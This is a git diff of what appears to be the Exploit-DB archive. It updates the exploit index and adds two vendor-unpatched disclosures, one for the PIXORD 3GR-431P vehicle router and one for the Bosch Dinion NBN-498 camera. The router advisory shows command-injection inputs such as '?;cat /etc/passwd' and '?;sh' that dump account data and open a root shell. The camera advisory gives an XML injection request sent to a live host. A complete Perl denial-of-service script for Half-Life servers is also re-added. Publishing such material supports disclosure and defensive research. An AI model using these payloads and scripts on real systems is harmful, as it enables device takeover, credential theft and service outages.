(build 18012) - Stored XSS in Multiple Parameters",2013-12-11,sajith,php,webapps,0 30215,platforms/ios/webapps/30215.txt,"Photo Video Album Transfer 1.0 iOS - Multiple Vulnerabilities",2013-12-11,Vulnerability-Lab,ios,webapps,0 -30283,platforms/php/webapps/30283.txt,"SquirrelMail G/PGP Encryption Plug-in 2.0/2.1 - Multiple Unspecified Remote Command Execution Vulnerabilities",2007-07-09,"Stefan Esser",php,webapps,0 +30283,platforms/php/webapps/30283.txt,"SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Multiple Unspecified Remote Command Execution Vulnerabilities",2007-07-09,"Stefan Esser",php,webapps,0 30216,platforms/cfm/webapps/30216.txt,"FuseTalk <= 4.0 - AuthError.CFM Multiple Cross-Site Scripting Vulnerabilities",2007-06-20,"Ivan Almuina",cfm,webapps,0 30217,platforms/php/webapps/30217.txt,"Wrapper.PHP for OsCommerce Local File Include Vulnerability",2007-06-20,"Joe Bloomquist",php,webapps,0 30218,platforms/multiple/remote/30218.txt,"BugHunter HTTP Server 1.6.2 Parse Error Information Disclosure Vulnerability",2007-06-20,Prili,multiple,remote,0 @@ -27594,7 +27594,7 @@ id,file,description,date,author,platform,type,port 30645,platforms/windows/remote/30645.txt,"Microsoft Windows URI Handler Command Execution Vulnerability",2007-10-05,"Billy Rios",windows,remote,0 30646,platforms/linux/dos/30646.txt,"Nagios Plugins 1.4.2/1.4.9 Location Header Remote Buffer Overflow Vulnerability",2007-07-16,"Nobuhiro Ban",linux,dos,0 30647,platforms/php/webapps/30647.txt,"SNewsCMS 2.1 News_page.PHP Cross-Site Scripting Vulnerability",2007-10-08,medconsultation.ru,php,webapps,0 -30648,platforms/linux/dos/30648.txt,"AlsaPlayer 0.99.x - Vorbis Input Plug-in OGG Processing Remote Buffer Overflow Vulnerability",2007-10-08,Erik,linux,dos,0 +30648,platforms/linux/dos/30648.txt,"AlsaPlayer 0.99.x - Vorbis Input Plugin OGG Processing Remote Buffer Overflow Vulnerability",2007-10-08,Erik,linux,dos,0 30649,platforms/cgi/webapps/30649.txt,"NetWin DNews Dnewsweb.EXE Multiple Cross-Site Scripting Vulnerabilities",2007-10-09,Doz,cgi,webapps,0 30650,platforms/hardware/remote/30650.txt,"Linksys SPA941 SIP From Field HTML Injection Vulnerability",2007-10-09,"Radu State",hardware,remote,0 30651,platforms/php/webapps/30651.txt,"Webmaster-Tips.net Joomla! RSS Feed Reader 1.0 - Remote File Include Vulnerability",2007-10-10,Cyber-Crime,php,webapps,0 @@ -28043,7 +28043,7 @@ id,file,description,date,author,platform,type,port 31151,platforms/linux/local/31151.c,"GKrellM GKrellWeather 0.2.7 Plugin Local Stack Based Buffer Overflow Vulnerability",2008-02-12,forensec,linux,local,0 31152,platforms/php/webapps/31152.txt,"artmedic weblog artmedic_print.php date Parameter XSS",2008-02-12,muuratsalo,php,webapps,0 31153,platforms/php/webapps/31153.txt,"artmedic weblog index.php jahrneu Parameter XSS",2008-02-12,muuratsalo,php,webapps,0 -31154,platforms/php/webapps/31154.txt,"Counter Strike Portals 'download' SQL Injection Vulnerability",2008-02-12,S@BUN,php,webapps,0 +31154,platforms/php/webapps/31154.txt,"Counter Strike Portals - 'download' SQL Injection Vulnerability",2008-02-12,S@BUN,php,webapps,0 31155,platforms/php/webapps/31155.txt,"Joomla! and Mambo com_iomezun Component - 'id' Parameter SQL Injection Vulnerability",2008-02-12,S@BUN,php,webapps,0 31156,platforms/php/webapps/31156.txt,"Cacti <= 0.8.7 graph_view.php graph_list Parameter SQL Injection",2008-02-12,aScii,php,webapps,0 31157,platforms/php/webapps/31157.txt,"Cacti <= 0.8.7 graph.php view_type Parameter XSS",2008-02-12,aScii,php,webapps,0 @@ -28509,7 +28509,7 @@ id,file,description,date,author,platform,type,port 31637,platforms/php/webapps/31637.txt,"W2B Dating Club - 'browse.php' SQL Injection Vulnerability",2008-04-11,The-0utl4w,php,webapps,0 31638,platforms/windows/remote/31638.txt,"HP OpenView Network Node Manager 7.x - (OV NNM) OpenView5.exe Action Parameter Traversal Arbitrary File Access",2008-04-11,"Luigi Auriemma",windows,remote,0 31639,platforms/php/webapps/31639.txt,"Trillian 3.1.9 - DTD File XML Parser Buffer Overflow Vulnerability",2008-04-11,david130490,php,webapps,0 -31640,platforms/php/webapps/31640.txt,"osCommerce Poll Booth 2.0 - Add-On 'pollbooth.php' SQL Injection Vulnerability",2008-04-13,S@BUN,php,webapps,0 +31640,platforms/php/webapps/31640.txt,"osCommerce Poll Booth 2.0 AddOn - 'pollbooth.php' SQL Injection Vulnerability",2008-04-13,S@BUN,php,webapps,0 31641,platforms/java/webapps/31641.txt,"Business Objects Infoview - 'cms' Parameter Cross-Site Scripting Vulnerability",2008-04-14,"Sebastien gioria",java,webapps,0 31643,platforms/windows/local/31643.rb,"Easy CD-DA Recorder - (PLS File) Buffer Overflow",2014-02-13,metasploit,windows,local,0 31644,platforms/asp/webapps/31644.txt,"Cezanne 6.5.1/7 - CFLookUP.asp Multiple Parameter XSS",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0 @@ -30689,7 +30689,7 @@ id,file,description,date,author,platform,type,port 34049,platforms/php/webapps/34049.txt,"Layout CMS 1.0 SQL-Injection and Cross-Site Scripting Vulnerabilities",2010-01-12,Red-D3v1L,php,webapps,0 34050,platforms/windows/remote/34050.py,"Home FTP Server 1.10.2.143 - Directory Traversal Vulnerability",2010-05-27,"John Leitch",windows,remote,0 34051,platforms/windows/dos/34051.py,"Core FTP Server 1.0.343 - Directory Traversal Vulnerability",2010-05-28,"John Leitch",windows,dos,0 -34052,platforms/php/webapps/34052.py,"osCommerce Visitor Web Stats Add-On 'Accept-Language' Header SQL Injection Vulnerability",2010-05-28,"Christopher Schramm",php,webapps,0 +34052,platforms/php/webapps/34052.py,"osCommerce Visitor Web Stats AddOn - 'Accept-Language' Header SQL Injection Vulnerability",2010-05-28,"Christopher Schramm",php,webapps,0 34053,platforms/php/webapps/34053.txt,"ImpressPages CMS 1.0x - 'admin.php' Multiple SQL Injection Vulnerabilities",2010-05-28,"High-Tech Bridge SA",php,webapps,0 34054,platforms/php/webapps/34054.txt,"GR Board 1.8.6 - 'page.php' Remote File Include Vulnerability",2010-05-30,eidelweiss,php,webapps,0 34055,platforms/php/webapps/34055.txt,"CMScout <= 2.08 - Cross-Site Scripting Vulnerability",2010-05-28,XroGuE,php,webapps,0 @@ -31416,7 +31416,7 @@ id,file,description,date,author,platform,type,port 34867,platforms/java/remote/34867.rb,"ManageEngine OpManager / Social IT Arbitrary File Upload",2014-10-02,"Pedro Ribeiro",java,remote,80 34868,platforms/windows/remote/34868.c,"Phoenix Project Manager 2.1.0.8 DLL Loading Arbitrary Code Execution Vulnerability",2010-10-19,anT!-Tr0J4n,windows,remote,0 34869,platforms/windows/remote/34869.c,"Cool iPhone Ringtone Maker 2.2.3 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-19,anT!-Tr0J4n,windows,remote,0 -34870,platforms/windows/remote/34870.html,"VLC Media Player 1.1.4 Mozilla Multimedia Plug-in Remote Code Execution Vulnerability",2010-10-19,shinnai,windows,remote,0 +34870,platforms/windows/remote/34870.html,"VLC Media Player 1.1.4 Mozilla Multimedia Plugin - Remote Code Execution Vulnerability",2010-10-19,shinnai,windows,remote,0 34871,platforms/php/webapps/34871.txt,"eCardMAX FormXP 'survey_result.php' Cross-Site Scripting Vulnerability",2009-07-15,Moudi,php,webapps,0 34872,platforms/windows/dos/34872.py,"MASS PLAYER 2.1 File Processing Remote Denial of Service Vulnerability",2010-10-19,Sweet,windows,dos,0 34873,platforms/php/webapps/34873.txt,"Wap-motor 'image' Parameter Directory Traversal Vulnerability",2009-08-27,Inj3ct0r,php,webapps,0 @@ -32466,7 +32466,7 @@ id,file,description,date,author,platform,type,port 36015,platforms/php/webapps/36015.txt,"Joomla! 'com_community' Component 'userid' Parameter SQL Injection Vulnerability",2011-08-03,"Ne0 H4ck3R",php,webapps,0 36016,platforms/multiple/remote/36016.txt,"Xpdf 3.02-13 'zxpdf' Security Bypass Vulnerability",2011-08-04,"Chung-chieh Shan",multiple,remote,0 36017,platforms/php/webapps/36017.txt,"HESK 2.2 Multiple Cross Site Scripting Vulnerabilities",2011-08-03,"High-Tech Bridge SA",php,webapps,0 -36018,platforms/php/webapps/36018.txt,"WordPress WP e-Commerce Plug-in 3.8.6 - 'cart_messages[]' Parameter Cross Site Scripting Vulnerability",2011-08-04,"High-Tech Bridge SA",php,webapps,0 +36018,platforms/php/webapps/36018.txt,"WordPress WP e-Commerce Plugin 3.8.6 - 'cart_messages[]' Parameter Cross Site Scripting Vulnerability",2011-08-04,"High-Tech Bridge SA",php,webapps,0 36019,platforms/asp/webapps/36019.txt,"Community Server 2007/2008 'TagSelector.aspx' Cross Site Scripting Vulnerability",2011-08-04,PontoSec,asp,webapps,0 36020,platforms/windows/remote/36020.txt,"Microsoft Visual Studio Report Viewer 2005 Control Multiple Cross Site Scripting Vulnerabilities",2011-08-09,"Adam Bixby",windows,remote,0 36041,platforms/php/webapps/36041.txt,"Fork CMS 3.8.5 - SQL Injection",2015-02-09,"Sven Schleier",php,webapps,80 @@ -32964,7 +32964,7 @@ id,file,description,date,author,platform,type,port 36539,platforms/php/webapps/36539.txt,"Advanced File Management 1.4 'users.php' Cross Site Scripting Vulnerability",2012-01-09,Am!r,php,webapps,0 36540,platforms/php/webapps/36540.txt,"WordPress Age Verification plugin 0.4 'redirect_to' Parameter URI Redirection Vulnerability",2012-01-10,"Gianluca Brindisi",php,webapps,0 36541,platforms/php/webapps/36541.txt,"PHP-Fusion 7.2.4 'downloads.php' Cross Site Scripting Vulnerability",2012-01-10,Am!r,php,webapps,0 -36542,platforms/windows/remote/36542.txt,"ExpressView Browser Plug-in 6.5.0.3330 - Multiple Integer Overflow and Remote Code Execution Vulnerabilities",2012-01-11,"Luigi Auriemma",windows,remote,0 +36542,platforms/windows/remote/36542.txt,"ExpressView Browser Plugin 6.5.0.3330 - Multiple Integer Overflow and Remote Code Execution Vulnerabilities",2012-01-11,"Luigi Auriemma",windows,remote,0 36543,platforms/php/webapps/36543.txt,"KnowledgeTree 3.x Multiple Cross Site Scripting Vulnerabilities",2012-01-11,"High-Tech Bridge SA",php,webapps,0 36544,platforms/php/webapps/36544.txt,"Kayako SupportSuite 3.x Multiple Vulnerabilities",2012-01-11,"Yuri Goltsev",php,webapps,0 36545,platforms/linux/dos/36545.txt,"Linux Kernel <= 3.1.8 KVM Local Denial of Service Vulnerability",2011-12-29,"Stephan Sattler",linux,dos,0 @@ -34003,7 +34003,7 @@ id,file,description,date,author,platform,type,port 37666,platforms/php/webapps/37666.txt,"Joomla! Helpdesk Pro Plugin < 1.4.0 - Multiple Vulnerabilities",2015-07-21,"Simon Rawet",php,webapps,80 37667,platforms/java/remote/37667.rb,"SysAid Help Desk 'rdslogs' Arbitrary File Upload",2015-07-21,metasploit,java,remote,0 37668,platforms/windows/remote/37668.php,"Internet Download Manager - OLE Automation Array Remote Code Execution",2015-07-21,"Mohammad Reza Espargham",windows,remote,0 -37669,platforms/windows/dos/37669.pl,"Counter-Strike 1.6 'GameInfo' Query Reflection DoS PoC",2015-07-22,"Todor Donev",windows,dos,0 +37669,platforms/windows/dos/37669.pl,"Counter-Strike 1.6 - 'GameInfo' Query Reflection DoS PoC",2015-07-22,"Todor Donev",windows,dos,0 37670,platforms/osx/local/37670.sh,"OS X 10.10 - DYLD_PRINT_TO_FILE Local Privilege Escalation",2015-07-22,"Stefan Esser",osx,local,0 37671,platforms/multiple/remote/37671.txt,"Websense Content Gateway Multiple Cross Site Scripting Vulnerabilities",2012-08-23,"Steven Sim Kok Leong",multiple,remote,0 37672,platforms/php/webapps/37672.txt,"JW Player 'logo.link' Parameter Cross Site Scripting Vulnerability",2012-08-29,MustLive,php,webapps,0 @@ -34656,3 +34656,12 @@ id,file,description,date,author,platform,type,port 38366,platforms/multiple/webapps/38366.py,"Verax NMS Multiple Method Authentication Bypass",2013-02-06,"Andrew Brooks",multiple,webapps,0 38367,platforms/php/webapps/38367.txt,"Your Own Classifieds Cross Site Scripting Vulnerability",2013-03-08,"Rafay Baloch",php,webapps,0 38368,platforms/multiple/remote/38368.txt,"McAfee Vulnerability Manager 'cert_cn' Parameter Cross Site Scripting Vulnerability",2013-03-08,"Asheesh Anaconda",multiple,remote,0 +38369,platforms/hardware/webapps/38369.txt,"Bosch Security Systems Dinion NBN-498 Web Interface - XML Injection",2015-10-01,neom22,hardware,webapps,0 +38370,platforms/hardware/remote/38370.txt,"PIXORD Vehicle 3G Wi-Fi Router 3GR-431P - Multiple Vulnerabilities",2015-10-01,"Karn Ganeshen",hardware,remote,0 +38371,platforms/osx/local/38371.py,"Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation",2015-10-01,rebel,osx,local,0 +38372,platforms/php/webapps/38372.html,"Question2Answer Cross Site Request Forgery Vulnerability",2013-03-01,MustLive,php,webapps,0 +38373,platforms/php/webapps/38373.txt,"WordPress Terillion Reviews Plugin Profile Id HTML Injection Vulnerability",2013-03-08,"Aditya Balapure",php,webapps,0 +38374,platforms/php/webapps/38374.txt,"SWFUpload Multiple Content Spoofing And Cross Site Scripting Vulnerabilities",2013-03-10,MustLive,php,webapps,0 +38375,platforms/php/webapps/38375.txt,"Asteriskguru Queue Statistics 'warning' Parameter Cross Site Scripting Vulnerability",2013-03-10,"Manuel García Cárdenas",php,webapps,0 +38376,platforms/php/webapps/38376.txt,"WordPress podPress Plugin 'playerID' Parameter Cross Site Scripting Vulnerability",2013-03-11,hiphop,php,webapps,0 +38377,platforms/php/webapps/38377.txt,"Privoxy Proxy Authentication Information Disclosure Vulnerabilities",2013-03-11,"Chris John Riley",php,webapps,0 diff --git a/platforms/hardware/remote/38370.txt b/platforms/hardware/remote/38370.txt new file mode 100755 index 000000000..c824c25db --- /dev/null +++ b/platforms/hardware/remote/38370.txt @@ -0,0 +1,231 @@ +# Exploit Title: [Vehicle 3G Wi-Fi Router - PIXORD - Multiple +Vulnerabilities] +# Date: May 01, 2015 [No response from Vendor till date] +# Discovered by: Karn Ganeshen +# Vendor Homepage: [http://www.pixord.com/en/products_show.php?show=17] +# Version: [Model Name :3GR-431P] +[Software Version :RTA-A001_02] +[Wireless Driver Version :2.6.0.0] + +*Vehicle 3G Wi-Fi Router - PIXORD * +http://www.pixord.com/en/products_show.php?show=17 + +*Device Info * + +Model Name :3GR-431P +Software Version :RTA-A001_02 +Wireless Driver Version :2.6.0.0 + +PiXORD 3GR-431P 3G Wi-Fi Router is a 3G + GPS + 802.11n (2T2R) wireless +router. It supports Internet access via 3G and receives position +information from GPS. 3GR-431P also supports two Ethernet ports for LAN +connectivity and 802.11n Wi-Fi Access Point for WLAN connectivity. + +It is available to install the 3GR-431P on the transportation. The +passengers can use the laptop or smart phone via Wi-Fi to browse the +Internet on the go. The Ethernet port also can connect IP camera to provide +the real time monitoring. + +Vulnerability Impact: Easy and full device compromise. Access to configured +keys, passwords, pass-phrases, accounts, etc. Ability to monitor the user / +vehicle via camera / connected devices. + +*Multiple Security Vulnerabilities * + +*1. OS command injection * +$ telnet 192.168.1.10 +Trying 192.168.1.10... +Connected to 192.168.1.10. +Escape character is '^]'. +Vehicle 3G Wi-Fi Router +Login: admin +Password: +> +> ? +mobile3G +mobileGPS +model +reboot +restoredefault +version + +As seen above, only few specific, functional options are available for +device management. + +However, we can bypass this and dump hashes easily. + +> ?;cat /etc/passwd +sh: ?: not found + +admin::0:0:Adminstrator:/:/bin/sh +support::0:0:Adminstrator:/:/bin/sh +user::0:0:Adminstrator:/:/bin/sh + +> exit + +Note that this is also applicable when a non-admin ‘user’ / ‘support’ logs +in over the Telnet. + +The web application lacks strict input validation and hence vulnerable to +OS command injection attack. + +*2. Configuration not secured properly / AuthZ issues * + +The device has three users - admin, support, user. + +Apparently, there is no separation of privileges between these 3 users, +when accessing over HTTP(S). All options are available to all three then. +This allows 'user' /'support' to access device configuration file - +RT2880_Settings.dat. Configuration backup contains b64-encoded login +passwords + clear-text WPA keys + other sensitive information. + +.. … +*Sensitive information in configuration file - * + +*more RT2880_Settings.dat * +#The following line must not be removed. +Default +WebInit=1 +HostName=pixord +Login=admin +Password== +Login2=support +Password2=== +Login3=user +Password3=== +OperationMode=1 +Platform=RT3352 +..... + +..... +wan_pppoe_user=pppoe_user +wan_pppoe_pass=pppoe_passwd +wan_l2tp_server=l2tp_server +wan_l2tp_user=l2tp_user +wan_l2tp_pass=l2tp_passwd +..... + +..... +wan_pptp_server=pptp_server +wan_pptp_user=pptp_user +wan_pptp_pass=pptp_passwd +..... + +..... +DDNS= +DDNSAccount= +DDNSPassword= +CountryRegion= +CountryRegionABand= +CountryCode= +BssidNum=1 +SSID1=PiXORD +WirelessMode=9 +..... + +..... +WscSSID=RalinkInitialAP +WscKeyMGMT=WPA-EAP +WscConfigMethod=138 +WscAuthType=1 +WscEncrypType=1 +WscNewKey= +IEEE8021X=0 +IEEE80211H=0 +CSPeriod=6 +PreAuth=0 +AuthMode=WPAPSKWPA2PSK +EncrypType=TKIPAES +RekeyInterval=3600 +RekeyMethod=TIME +PMKCachePeriod=10 +WPAPSK1= +DefaultKeyID=2 +Key1Type=0 +Key1Str1= +Key2Type=0 +Key2Str1= +Key3Type=0 +Key3Str1= +Key4Type=0 +Key4Str1= +WapiPskType=0 +..... + +..... +WdsEnable=0 +WdsEncrypType=NONE +WdsList= +WdsKey= +WirelessEvent=0 +RADIUS_Server=0 +RADIUS_Port=1812 +RADIUS_Key= +RADIUS_Acct_Server= +RADIUS_Acct_Port=1813 +RADIUS_Acct_Key= +..... + +..... +wan_3g_apn=public +wan_3g_dial=*99# +wan_3g_user= +wan_3g_pass= + +RADIUS_Key1= +..... + +..... + +Also, as observed in point 1 above, all the users have a UID 0, i.e. root +level privileges to the device: + +admin::0:0:Adminstrator:/:/bin/sh +support::0:0:Adminstrator:/:/bin/sh +user::0:0:Adminstrator:/:/bin/sh + +The application should ideally provide specific privileges to different +users, and enforce strict access control. + +*3. Application does not secure configured passwords (HTTPS) * + +Masked password(s) can be retrieved via frame source (inspect element) and +/ or intercepting request via a proxy. + +The application should mask/censure (*****) the passwords, keys and any +other crucial pieces of configuration and must not pass the values in +clear-text. + +*4. Program / Scripts running in an insecure manner - leaking clear-text +passwords in process information * + +After logging in to the device over Telnet, we can drop in to a shell via +OS command injection attack described in point 1. + +> ?;sh +sh: ?: not found +Enter 'help' for a list of built-in commands. +BusyBox v1.12.1 (2012-12-25 11:48:22 CST) built-in shell (ash) + +# + +Checking running processes reveal a system program *inadyn*, which +apparently is a service for ddns connectivity, leaking valid username and +password in clear-text. + +# ps aux +PID USER VSZ STAT COMMAND +1 admin 1768 S init +2 admin 0 RWN [ksoftirqd/0] +..... + +..... +2159 admin 1096 S inadyn -u ** -p ** + -a ** +4050 admin 1768 R ps aux + +The programs should be run securely without passing cli arguments and +parameter values in clear-text. +-- +Best Regards, +Karn Ganeshen diff --git a/platforms/hardware/webapps/38369.txt b/platforms/hardware/webapps/38369.txt new file mode 100755 index 000000000..571ebaeda --- /dev/null +++ b/platforms/hardware/webapps/38369.txt @@ -0,0 +1,100 @@ +# Exploit Title: Bosch Security Systems - XML Injection - Dinion NBN-498 Web Interface + +# Date: 01/09/2015 + +# Exploit Author: neom22 + +# Vendor Homepage: http://us.boschsecurity.com + +# Data Sheet: http://resource.boschsecurity.us/documents/Data_sheet_enUS_9007201286798987.pdf + +# Version: Hardware Firmware 4.54.0026 - Web Interface version is unknown + +# Tested on: Windows 8.1 - Firefox 40.0.3 + +# CVE : CVE-2015-6970 (To be published) + + +################################################# +# # +# Discovered by neom22 # +# 23 - 09 - 2015 # +# # +################################################# +# +# +Bosch Security Systems - Dinion NBN-498 - Web Interface (Live Feed and Administration) +# +# +Vulnerability Discovery: 10/09/2015 +Vendor Contact: 17/09/2015 (no answer) +Published: 24/09/2015 +# +# + +Description: +----------------------------------------------------------------- +The Dinion2x IP Day/Night camera is a high-performance, smart +surveillance color camera. It incorporates 20-bit digital signal +processing and a wide dynamic range sensor for outstanding +picture performance under all lighting conditons. +The camera uses H.264 compression technology to give clear +images while reducing bandwidth and storage requirements. It +is also ONVIF compliant to improve compatibility during system +integration. +The camera operates as a network video server and transmits +video and control signals over data networks, such as Ethernet +LANs and the Internet. +----------------------------------------------------------------- + +Useful Links: + +Data Sheet: http://resource.boschsecurity.us/documents/Data_sheet_enUS_9007201286798987.pdf +Documentation: http://resource.boschsecurity.us/documents/Installation_Manual_enUS_2032074379.pdf +Product: + +http://us.boschsecurity.com/en/us_product/products/video/ipcameras/sdfixedcameras/nbn498dinion2xdaynightipc/nbn498 + +dinion2xdaynightipc_608 +----------------------------------------------------------------- + +XML Parameter Injection POC + +_-Request-_ + +GET /rcp.xml?idstring=injection HTTP/1.1 +Host: postoipiranga.dyndns-ip.com:10004 +User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: HcsoB=60cd4a687de94857 +Connection: keep-alive + +_-Response-_ + +HTTP/1.1 200 OK +Server: VCS-VideoJet-Webserver +Connection: keep-alive +Content-Type: text/xml +Accept-Ranges: bytes +Content-Length: 359 +Expires: 0 +Cache-Control: no-cache +Set-Cookie: HcsoB=60cd4a687de94857; path=/; + + + + 0x0000 + 0 + + T_DWORD + READ + 0 + injection + +0x478e0x000000001TCP + 0x40 + + + \ No newline at end of file diff --git a/platforms/linux/remote/22141.c b/platforms/linux/remote/22141.c index d70328935..5d262aa47 100755 --- a/platforms/linux/remote/22141.c +++ b/platforms/linux/remote/22141.c @@ -1,8 +1,8 @@ -source: http://www.securityfocus.com/bid/6580/info +//source: http://www.securityfocus.com/bid/6580/info -A format string vulnerability has been discovered in the Half-Life AdminMod plugin. The problem occurs in commands which call the selfmessage() function, which is used by other functions to write a message to the users console. The format string occurs when the System_Response() function is called by selfmessage() to log the administrative command. An 'rcon' authenticated user may be able to exploit this issue to overwrite sensitive locations in memory. +//A format string vulnerability has been discovered in the Half-Life AdminMod plugin. The problem occurs in commands which call the selfmessage() function, which is used by other functions to write a message to the users console. The format string occurs when the System_Response() function is called by selfmessage() to log the administrative command. An 'rcon' authenticated user may be able to exploit this issue to overwrite sensitive locations in memory. -Successful exploitation of this issue would allow an attacker to execute arbitrary commands with the privileges of the Half-Life server. +// Successful exploitation of this issue would allow an attacker to execute arbitrary commands with the privileges of the Half-Life server. /***************************************************************** * hoagie_adminmod.c diff --git a/platforms/linux/remote/22968.c b/platforms/linux/remote/22968.c index 060a6402f..f4ebe7155 100755 --- a/platforms/linux/remote/22968.c +++ b/platforms/linux/remote/22968.c @@ -1,8 +1,8 @@ -source: http://www.securityfocus.com/bid/8300/info +//source: http://www.securityfocus.com/bid/8300/info -Half-Life servers are prone to a buffer overflow that may be exploited by a malicious remote client. The vulnerability occurs because the software fails to sufficiently bounds-check client-supplied data during requests to join multiplayer games. This could allow attackers to execute code in the context of the vulnerable server. +//Half-Life servers are prone to a buffer overflow that may be exploited by a malicious remote client. The vulnerability occurs because the software fails to sufficiently bounds-//check client-supplied data during requests to join multiplayer games. This could allow attackers to execute code in the context of the vulnerable server. -This vulnerability affects the server bundled with Half-Life and the free Dedicated Server for both Windows and Linux operating systems. +//This vulnerability affects the server bundled with Half-Life and the free Dedicated Server for both Windows and Linux operating systems. // // PRIV8 SECURITY & UHAGr CONFIDENTIAL SOURCE - DO NOT DISTRIBUTE !!! diff --git a/platforms/linux/remote/22969.c b/platforms/linux/remote/22969.c index aa0d58e29..fcc6e135a 100755 --- a/platforms/linux/remote/22969.c +++ b/platforms/linux/remote/22969.c @@ -1,8 +1,8 @@ -source: http://www.securityfocus.com/bid/8300/info +// source: http://www.securityfocus.com/bid/8300/info -Half-Life servers are prone to a buffer overflow that may be exploited by a malicious remote client. The vulnerability occurs because the software fails to sufficiently bounds-check client-supplied data during requests to join multiplayer games. This could allow attackers to execute code in the context of the vulnerable server. +// Half-Life servers are prone to a buffer overflow that may be exploited by a malicious remote client. The vulnerability occurs because the software fails to sufficiently bounds-check client-supplied data during requests to join multiplayer games. This could allow attackers to execute code in the context of the vulnerable server. -This vulnerability affects the server bundled with Half-Life and the free Dedicated Server for both Windows and Linux operating systems. +// This vulnerability affects the server bundled with Half-Life and the free Dedicated Server for both Windows and Linux operating systems. /***************************************************************** * hoagie_hlserver.c diff --git a/platforms/multiple/dos/1483.pl b/platforms/multiple/dos/1483.pl index 746231e1f..328679bdf 100755 --- a/platforms/multiple/dos/1483.pl +++ b/platforms/multiple/dos/1483.pl @@ -1,40 +1,40 @@ -#!/usr/bin/perl -# Server must not be running steam. /str0ke - - -# Half-Life engine remote DoS exploit -# bug found by Firestorm -# tested against cstrike 1.6 Windows build-in server, cstrike 1.6 linux dedicated server -use IO::Socket; -die "usage: ./csdos " unless $ARGV[0]; -$host=$ARGV[0]; - -if (fork()) -{ econnect($host); } -else -{ econnect($host); }; -exit; - -sub econnect($) -{ - my $host=$_[0]; - my $sock = new -IO::Socket::INET(PeerAddr=>$host,PeerPort=>'27015',Proto=>'udp'); - die "Could not create socket: $!\n" unless $sock; - $cmd="\xff\xff\xff\xff"; - syswrite $sock, $cmd."getchallenge"; - - sysread $sock,$b,65535; print $b,"\n"; - @c=split(/ /,$b); - - $c2=$c[1]; - - $q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a36258af1bb64ed866538c9db76\"\"\\\"\0\0"; -print '>',$q,"\n"; -syswrite $sock, $q; -sysread $sock,$b,65535; print $b,"\n"; -sleep 3; -close $sock; -} - -# milw0rm.com [2006-02-11] +#!/usr/bin/perl +# Server must not be running steam. /str0ke + + +# Half-Life engine remote DoS exploit +# bug found by Firestorm +# tested against cstrike 1.6 Windows build-in server, cstrike 1.6 linux dedicated server +use IO::Socket; +die "usage: ./csdos " unless $ARGV[0]; +$host=$ARGV[0]; + +if (fork()) +{ econnect($host); } +else +{ econnect($host); }; +exit; + +sub econnect($) +{ + my $host=$_[0]; + my $sock = new +IO::Socket::INET(PeerAddr=>$host,PeerPort=>'27015',Proto=>'udp'); + die "Could not create socket: $!\n" unless $sock; + $cmd="\xff\xff\xff\xff"; + syswrite $sock, $cmd."getchallenge"; + + sysread $sock,$b,65535; print $b,"\n"; + @c=split(/ /,$b); + + $c2=$c[1]; + + $q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a36258af1bb64ed866538c9db76\"\"\\\"\0\0"; +print '>',$q,"\n"; +syswrite $sock, $q; +sysread $sock,$b,65535; print $b,"\n"; +sleep 3; +close $sock; +} + +# milw0rm.com [2006-02-11] diff --git a/platforms/multiple/remote/22138.c b/platforms/multiple/remote/22138.c index 23dc249ac..6e412152b 100755 --- a/platforms/multiple/remote/22138.c +++ b/platforms/multiple/remote/22138.c @@ -1,10 +1,10 @@ -source: http://www.securityfocus.com/bid/6575/info +// source: http://www.securityfocus.com/bid/6575/info -The Half-Life StatsMe plug-in is prone to an exploitable buffer overflow condition. This issue may be exploited by an attacker who can authenticate with the rcon-password of the Half-Life server to execute arbitrary code in the context of the server process. +// The Half-Life StatsMe plug-in is prone to an exploitable buffer overflow condition. This issue may be exploited by an attacker who can authenticate with the rcon-password of the Half-Life server to execute arbitrary code in the context of the server process. -Exploitation may be dependant on which other plug-ins are running on the Half-Life server. +// Exploitation may be dependant on which other plug-ins are running on the Half-Life server. -Successful exploitation will allow an attacker to gain local and possibly privileged access to the host running the server. +// Successful exploitation will allow an attacker to gain local and possibly privileged access to the host running the server. /***************************************************************** * hoagie_statsme.c diff --git a/platforms/multiple/remote/22139.c b/platforms/multiple/remote/22139.c index 5f5f0f9b2..74278d3aa 100755 --- a/platforms/multiple/remote/22139.c +++ b/platforms/multiple/remote/22139.c @@ -1,8 +1,8 @@ -source: http://www.securityfocus.com/bid/6577/info +//source: http://www.securityfocus.com/bid/6577/info -A format string vulnerability has been discovered in the Half-Life ClanMod plugin. The problem occurs in the 'cm_log' command which is designed to write a message to the server log file. An 'rcon' authenticated user may be able to exploit this issue to overwrite sensitive locations in memory. +// A format string vulnerability has been discovered in the Half-Life ClanMod plugin. The problem occurs in the 'cm_log' command which is designed to write a message to the server log file. An 'rcon' authenticated user may be able to exploit this issue to overwrite sensitive locations in memory. -Successful exploitation of this issue would allow an attacker to execute arbitrary commands with the privileges of the Half-Life server. +// Successful exploitation of this issue would allow an attacker to execute arbitrary commands with the privileges of the Half-Life server. /***************************************************************** * hoagie_clanmod.c diff --git a/platforms/multiple/remote/22140.c b/platforms/multiple/remote/22140.c index b7283521f..941b895cb 100755 --- a/platforms/multiple/remote/22140.c +++ b/platforms/multiple/remote/22140.c @@ -1,10 +1,10 @@ -source: http://www.securityfocus.com/bid/6578/info +// source: http://www.securityfocus.com/bid/6578/info -The Half-Life StatsMe plug-in is prone to an exploitable format string vulnerability. This issue may be exploited by an attacker who can authenticate with the rcon-password of the Half-Life server to execute arbitrary code in the context of the server process. +// The Half-Life StatsMe plug-in is prone to an exploitable format string vulnerability. This issue may be exploited by an attacker who can authenticate with the rcon-password of the Half-Life server to execute arbitrary code in the context of the server process. -Exploitation may be dependant on which other plug-ins are running on the Half-Life server. +// Exploitation may be dependant on which other plug-ins are running on the Half-Life server. -Successful exploitation will allow an attacker to gain local and possibly privileged access to the host running the server. +// Successful exploitation will allow an attacker to gain local and possibly privileged access to the host running the server. /***************************************************************** * hoagie_statsme.c diff --git 